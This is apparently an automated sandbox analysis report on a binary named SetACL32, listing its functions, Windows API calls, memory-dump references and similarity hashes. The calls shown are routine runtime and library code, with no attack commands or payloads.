                Function 00F510E0 Relevance: 1.5, APIs: 1, Instructions: 27networkCOMMON
                Download Yara Rule
                APIs
                • WSAStartup.WS2_32(00000002,00000002), ref: 00F51120
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Startup
                • String ID:
                • API String ID: 724789610-0
                • Opcode ID: 7160471e88ea3094c610d090865c345188cb4fbbe2fa7ac56e3414ac6d8ab052
                • Instruction ID: c4392d558fb2028fced9d2ba38988bf09cbbaa236d1126b739212d6fd6b11cb0
                • Opcode Fuzzy Hash: 7160471e88ea3094c610d090865c345188cb4fbbe2fa7ac56e3414ac6d8ab052
                • Instruction Fuzzy Hash: F7F0E5B09542044FD320BB38DD17BB573D8EB05311F40056AE99DC7280EB21A911A7C3
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9A845 Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,?,?,00F99092,?,00000055,00000050), ref: 00F9A870
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: DefaultUser
                • String ID:
                • API String ID: 3358694519-0
                • Opcode ID: 266a3c81db6cb7daa3b437dbdb43ed1f7139f2d405e454a835bf88e2d9395879
                • Instruction ID: 142d6d7d495ad8891c4de2f2b9e23b34f5bb43b8eb22fdf42db92c3cdf12b64f
                • Opcode Fuzzy Hash: 266a3c81db6cb7daa3b437dbdb43ed1f7139f2d405e454a835bf88e2d9395879
                • Instruction Fuzzy Hash: 77E08C3294022CB7EF123B61DC08A9E7F19EF447A0F008021F9085A121CB75C922FBC2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FACEF2 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Free
                • String ID:
                • API String ID: 3978063606-0
                • Opcode ID: c07ec56f7fb4e07c02550d401a2322ba9069e748c51ce6a486b1f4069ccae43e
                • Instruction ID: 8dec152b42002e649de26b4927c9b73678f5a4cbc2fb5135004df906182ce95b
                • Opcode Fuzzy Hash: c07ec56f7fb4e07c02550d401a2322ba9069e748c51ce6a486b1f4069ccae43e
                • Instruction Fuzzy Hash: 5FA001B45000089B8E055B12AF8A9843A62EA81302B044564AA0E4287097650525AF22
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FACFD1 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Free
                • String ID:
                • API String ID: 3978063606-0
                • Opcode ID: e13318283fa45cbac88194f0b09829becb72d163117cc12e945ab9586334b693
                • Instruction ID: 297c52f47cb70c1facc102001c78f2c487fc4a89f05cd7b4522687b3103fffac
                • Opcode Fuzzy Hash: e13318283fa45cbac88194f0b09829becb72d163117cc12e945ab9586334b693
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00FAD0D1 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Free
                • String ID:
                • API String ID: 3978063606-0
                • Opcode ID: 8ff05901565bb911f589b38b78e95daea37cd9bb9eccca1f1a22f0344b8b891c
                • Instruction ID: f67c8dd9faacd55c9950f03435bb56a0d7fec2462b74ce29dc54e86edde8b29d
                • Opcode Fuzzy Hash: 8ff05901565bb911f589b38b78e95daea37cd9bb9eccca1f1a22f0344b8b891c
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00F8AB5F Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F8AB65
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F8AB73
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F8AB84
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F8AB95
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F8ABA6
                • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F8ABB7
                • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00F8ABC8
                • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F8ABD9
                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00F8ABEA
                • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F8ABFB
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F8AC0C
                • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F8AC1D
                • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F8AC2E
                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F8AC3F
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F8AC50
                • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F8AC61
                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F8AC72
                • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00F8AC83
                • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00F8AC94
                • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00F8ACA5
                • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00F8ACB6
                • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00F8ACC7
                • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00F8ACD8
                • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00F8ACE9
                • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00F8ACFA
                • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00F8AD0B
                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F8AD1C
                • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00F8AD2D
                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F8AD3E
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F8AD4F
                • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00F8AD60
                • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F8AD71
                • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00F8AD82
                • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F8AD93
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00F8ADA4
                • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00F8ADB5
                • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00F8ADC6
                • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00F8ADD7
                • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00F8ADE8
                • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00F8ADF9
                • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00F8AE0A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: AddressProc$HandleModule
                • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                • API String ID: 667068680-295688737
                • Opcode ID: 33a4be109e50bc62c0a6075ab900e01d10c3a2fcd63b4b2bee5e7d72186a0c0f
                • Instruction ID: dd8f68e059b6ddf9492e0e68aa2a89eeb733f8e5f3995a4572476744bcd30770
                • Opcode Fuzzy Hash: 33a4be109e50bc62c0a6075ab900e01d10c3a2fcd63b4b2bee5e7d72186a0c0f
                • Instruction Fuzzy Hash: 51610DF5D5331DABC700AFB4AD0FE463AE8AA9B7093018566F501D7561D7B8A004BFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F80B70 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 167COMMON
                Download Yara Rule
                APIs
                • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00F80BCF
                • GetLastError.KERNEL32 ref: 00F80BD9
                • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00F80BF9
                • GetLastError.KERNEL32 ref: 00F80C03
                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00FBFE30,00000000), ref: 00F80C22
                • GetLastError.KERNEL32 ref: 00F80C2C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: DescriptorErrorLastSecurity$DaclGroupOwner
                • String ID: @M)w
                • API String ID: 3317944899-1211491014
                • Opcode ID: 2378a719b39a26617efadc22271c69964b8e94433a460951f8eaebd38eb27316
                • Instruction ID: 67ab3908793753dbe739600a68a74ba9725fb2fb55d1f9c25ae43fdae4185514
                • Opcode Fuzzy Hash: 2378a719b39a26617efadc22271c69964b8e94433a460951f8eaebd38eb27316
                • Instruction Fuzzy Hash: 985192B1E00209AFEB50EF64DC45BEA77A8FB05320F544629FC15D3290EB75A914EB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F99EEC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,00F9A20A,00000002,00000000,?,?,?,00F9A20A,?,00000000), ref: 00F99F85
                • GetLocaleInfoW.KERNEL32(?,20001004,00F9A20A,00000002,00000000,?,?,?,00F9A20A,?,00000000), ref: 00F99FAE
                • GetACP.KERNEL32(?,?,00F9A20A,?,00000000), ref: 00F99FC3
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: 6ea596e257a8fcb2e32d25dffe28d24ed9a72879e72b885d6c3c6edce8ee4b96
                • Instruction ID: 16a70a425e7e5de6d53d1fb583fa0e5c71ca62b71d63ff4a5f3b9a7a2445cc7f
                • Opcode Fuzzy Hash: 6ea596e257a8fcb2e32d25dffe28d24ed9a72879e72b885d6c3c6edce8ee4b96
                • Instruction Fuzzy Hash: DF218332F08104AAFF308F18C905A97F3AAAB51B68B57846CE909D7104F7B2DD40E750
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9A0C1 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F97282
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F972B8
                • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F9A1CD
                • IsValidCodePage.KERNEL32(00000000), ref: 00F9A216
                • IsValidLocale.KERNEL32(?,00000001), ref: 00F9A225
                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F9A26D
                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F9A28C
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                • String ID:
                • API String ID: 949163717-0
                • Opcode ID: 26305100e010f47d42b261a46d96070ea160d29d268eb610b66a895679208ff3
                • Instruction ID: 7ffbddec2d4753678aaff3c3fda3a9762b8af6eb65eacc5dc4cab2886e54d160
                • Opcode Fuzzy Hash: 26305100e010f47d42b261a46d96070ea160d29d268eb610b66a895679208ff3
                • Instruction Fuzzy Hash: 47517E71E00219ABFF10EFA5DC41BBA77B8FF44710F150069A911E7190E7749A84EFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F62720 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                Download Yara Rule
                APIs
                • FindResourceW.KERNEL32(00000000,00000001,00000010,746D712B,?,?), ref: 00F6277B
                • LoadResource.KERNEL32(00000000,00000000), ref: 00F62788
                • LockResource.KERNEL32(00000000), ref: 00F62795
                • FreeResource.KERNEL32(00000000), ref: 00F627EF
                  • Part of subcall function 00F62850: VerQueryValueW.VERSION(00000000,?,?,?,\VarFileInfo\Translation,00000018,746D712B,00000000,?,00000000), ref: 00F62906
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Resource$FindFreeLoadLockQueryValue
                • String ID:
                • API String ID: 4268186394-0
                • Opcode ID: e528a00d941629d9ce1925d588bdf48117c2074419c589c6bae84a27e6cd3b38
                • Instruction ID: 0b109d4c15812664ea165d190e8650ded00327bc59ca9f5913a70d3463ca1d23
                • Opcode Fuzzy Hash: e528a00d941629d9ce1925d588bdf48117c2074419c589c6bae84a27e6cd3b38
                • Instruction Fuzzy Hash: A331D4B1D006089BDB10DF74DC45BEEBBB5FF48720F14462EE801A3280EB79AA44DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8BA19 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                Download Yara Rule
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F8BA25
                • IsDebuggerPresent.KERNEL32 ref: 00F8BAF1
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F8BB11
                • UnhandledExceptionFilter.KERNEL32(?), ref: 00F8BB1B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: c4b663f71c5ff6e6a665370c512dcb1cfc08b1e0d5cd452346bd6287ab30c59a
                • Instruction ID: e3670347775b4b77caac563b2ac0d170225c02916ac07ead13e9d67e503a439f
                • Opcode Fuzzy Hash: c4b663f71c5ff6e6a665370c512dcb1cfc08b1e0d5cd452346bd6287ab30c59a
                • Instruction Fuzzy Hash: 603118B5D0521C9BDF20EFA4DD89BCDBBB8AF08300F1040AAE40DAB250EB755A85DF45
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F99B73 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F97282
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F972B8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F99BC7
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F99C11
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F99CD7
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: InfoLocale$ErrorLast_free
                • String ID:
                • API String ID: 3140898709-0
                • Opcode ID: 046727cda2ee7ad26878b3cd3aba4d1f2544fd36428310145d219c46b3aa8fc7
                • Instruction ID: abbbfa6d268741a9e3a3f806d0a4e6e78ac0c5dba20361b62449f67fb2c0c2ce
                • Opcode Fuzzy Hash: 046727cda2ee7ad26878b3cd3aba4d1f2544fd36428310145d219c46b3aa8fc7
                • Instruction Fuzzy Hash: 2B61C0719182179FFF68DF2CCC82BAA77A8EF04320F11407AE905C6185E7B9D985EB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8F1A3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F8F29B
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F8F2A5
                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F8F2B2
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: 51d7362e96afd06f1066060b39acec6a973224b238dd08306a9365d79576bf34
                • Instruction ID: 27debffd969aa37c4b941404634d8a65f64b1b231a48f2baf1b4f6d391f99de4
                • Opcode Fuzzy Hash: 51d7362e96afd06f1066060b39acec6a973224b238dd08306a9365d79576bf34
                • Instruction Fuzzy Hash: BA31C27590122CABCB21EF24DD89BCDBBB8BF18310F5041EAE41CA7290E7749B859F55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8BC85 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                Download Yara Rule
                APIs
                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F8BC9B
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FeaturePresentProcessor
                • String ID:
                • API String ID: 2325560087-0
                • Opcode ID: bffa026de640578bcfe963204c534b80155635b8d8ffc52f0af24a0e7955920b
                • Instruction ID: b06458298b67336d5266174e327f36d54c29681210041df1c23a8dc37de19ff9
                • Opcode Fuzzy Hash: bffa026de640578bcfe963204c534b80155635b8d8ffc52f0af24a0e7955920b
                • Instruction Fuzzy Hash: D651AFB2D15609DFDB24CF64DA86BEEBBF0FB48325F14846AC805EB250D375A940DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F99DC6 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F97282
                  • Part of subcall function 00F97220: _free.LIBCMT ref: 00F972B8
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F99E1A
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast_free$InfoLocale
                • String ID:
                • API String ID: 2003897158-0
                • Opcode ID: f9c62ca63dc1d1b25d4e2186fb1530d5d97d2fa837a61e596f846c92012a32de
                • Instruction ID: 39a632d66c57b108de67537fdacdf6583e78bbb01d7a6de1f57dd4dab04f18e9
                • Opcode Fuzzy Hash: f9c62ca63dc1d1b25d4e2186fb1530d5d97d2fa837a61e596f846c92012a32de
                • Instruction Fuzzy Hash: B3218672A182065BFF28EB69DC41ABA77ACEF45321B11007DF901C6141EBB9DD44EB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F99A4D Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
